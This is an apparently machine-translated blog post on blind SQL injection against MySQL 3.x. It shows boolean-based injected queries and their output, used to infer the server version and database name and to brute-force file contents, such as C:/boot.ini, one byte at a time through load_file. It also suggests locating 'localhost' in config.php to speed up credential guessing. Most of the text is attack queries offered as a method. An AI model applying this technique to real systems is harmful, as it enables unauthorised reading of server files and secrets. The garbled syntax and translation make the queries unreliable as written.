Thoughts on mysql 3.0 Injection

Mysql 3.0 Injection

The injection of mysql mainly relies on union queries, but union only applies to version 4. 0 or more useful, for 3. 0 or less will be useless ..........

Therefore, in mysql 3.0 databases, union cannot be used for cross-table queries, but load_file can be used.

However, it cannot be replaced by union. Here is my idea:

Get version:

Mysql> select * from user where userid = 1 and length (version () <10;

Empty set (0.00 sec)

Mysql> select * from user where userid = 1 and length (version () <1777;

+ -------- + ---------- +

| Userid | username | password |

+ -------- + ---------- +

| 1 | angel | mypass |

+ -------- + ---------- +

1 row in set (0.00 sec)

Obtain the current database:

Mysql> select * from user where userid = 1 and length (database ()> 0;

+ -------- + ---------- +

| Userid | username | password |

+ -------- + ---------- +

| 1 | angel | mypass |

+ -------- + ---------- +

1 row in set (0.00 sec)

File brute force code:

Mysql> select * from user where userid = 1 and ascii (mid (load_file ('C:/boot. ini '), 1, 1) <1;

Empty set (0.05 sec)

Mysql> select * from user where userid = 1 and ascii (mid (load_file ('C:/boot. ini '), 1, 1)> 1;

+ -------- + ---------- +

| Userid | username | password |

+ -------- + ---------- +

| 1 | angel | mypass |

+ -------- + ---------- +

1 row in set (0.00 sec)

Because of the heavy workload, it can be implemented using a program (but it is also very troublesome)

In addition, you can use the character processing function to get the "Location of special characters". For example, we use config. in the PHP file, we can select "localhost" (or other) as a special character. First, we can get the location (in which byte) and guess it nearby, which saves a lot of work.